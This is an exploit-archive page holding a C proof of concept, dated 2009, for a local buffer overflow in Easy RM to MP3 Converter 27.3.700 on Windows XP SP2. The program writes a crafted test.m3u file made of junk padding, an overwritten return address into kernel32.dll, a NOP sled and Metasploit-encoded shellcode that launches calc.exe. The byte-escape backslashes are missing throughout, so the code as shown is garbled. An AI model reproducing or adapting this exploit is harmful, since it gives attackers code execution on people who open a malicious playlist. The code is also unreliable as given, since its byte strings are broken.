[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Easy RM to MP3 27.3.700 local BOF xp sp2
# Published : 2009-12-23
# Author : bibi-info
# Previous Title : Adobe Reader and Acrobat (CVE-2009-4324) Exploit
# Next Title : Easy RM to MP3 2.7.3.700 BoF Exploit 


// Exploit Title: Easy RM to MP3 27.3.700 local Buffer OverFlow Exploit on xp sp2
// Date: 24/12/2009
// Author: bibi-info
// Software Link: http://www.rm-to-mp3.net/EasyRMtoMP3Converter.exe
// Version: 27.3.700
// Tested on: Windows Xp sp2
// greetz : His0k4 & All friends & muslims HaCkers(dz) (18/11/2009 )



#include<stdio.h>
#include<string.h>
#include<stdlib.h>



/* win32_exec -  EXITFUNC=process CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com */
unsigned char scode[] =
                         "xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49"
                         "x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36"
                         "x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34"
                         "x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41"
                         "x56x58x34x5ax38x42x44x4ax4fx4dx4ex4fx4ax4ex46x44"
                         "x42x50x42x30x42x30x4bx38x45x34x4ex33x4bx58x4ex47"
                         "x45x30x4ax47x41x30x4fx4ex4bx58x4fx54x4ax41x4bx48"
                         "x4fx35x42x42x41x50x4bx4ex49x54x4bx48x46x43x4bx58"
                         "x41x30x50x4ex41x43x42x4cx49x59x4ex4ax46x38x42x4c"
                         "x46x47x47x50x41x4cx4cx4cx4dx50x41x30x44x4cx4bx4e"
                         "x46x4fx4bx53x46x55x46x42x46x50x45x47x45x4ex4bx58"
                         "x4fx35x46x32x41x50x4bx4ex48x46x4bx38x4ex30x4bx54"
                         "x4bx38x4fx45x4ex41x41x50x4bx4ex4bx38x4ex41x4bx38"
                         "x41x30x4bx4ex49x48x4ex35x46x52x46x30x43x4cx41x33"
                         "x42x4cx46x36x4bx48x42x34x42x43x45x38x42x4cx4ax37"
                         "x4ex50x4bx58x42x44x4ex50x4bx38x42x57x4ex41x4dx4a"
                         "x4bx58x4ax46x4ax30x4bx4ex49x30x4bx48x42x38x42x4b"
                         "x42x50x42x50x42x30x4bx58x4ax46x4ex43x4fx45x41x33"
                         "x48x4fx42x56x48x45x49x58x4ax4fx43x38x42x4cx4bx37"
                         "x42x35x4ax46x50x57x4ax4dx44x4ex43x47x4ax46x4ax39"
                         "x50x4fx4cx48x50x50x47x35x4fx4fx47x4ex43x36x41x36"
                         "x4ex36x43x46x42x50x5a";





int main ( int argc , char * argv[])

{

    FILE* fexp= NULL;
    char* EIP = "x0CxADx81x7C"; //0X7CAD810C kernel32.dll
    int i;


    system("cls");
    printf("t. .. ...Easy RM to MP3 Converter m3u File Buffer Overflow... .. .rn");
    printf("t          ------> execute calc.exe <-------n");


    if( (fexp=fopen("test.m3u","wb")) ==NULL )
    {
         perror("cannot open exploit  file!!!");
         exit(0);
    }

                for (i=0; i<26069; i++)
                {
                    fwrite("x41", 1, 1, fexp);  //Junk
                }

                fwrite(EIP, 4, 1, fexp);

                for (i=0; i<50; i++)
                {
                    fwrite("x90", 1, 1, fexp);// Nop's
                }

                fwrite(scode, sizeof(scode), 1, fexp);

                fclose(fexp);
                printf("[+] test.m3u Createdrn");
                printf("[+] Exploited By b!b!-!nforn");


    return 0;

}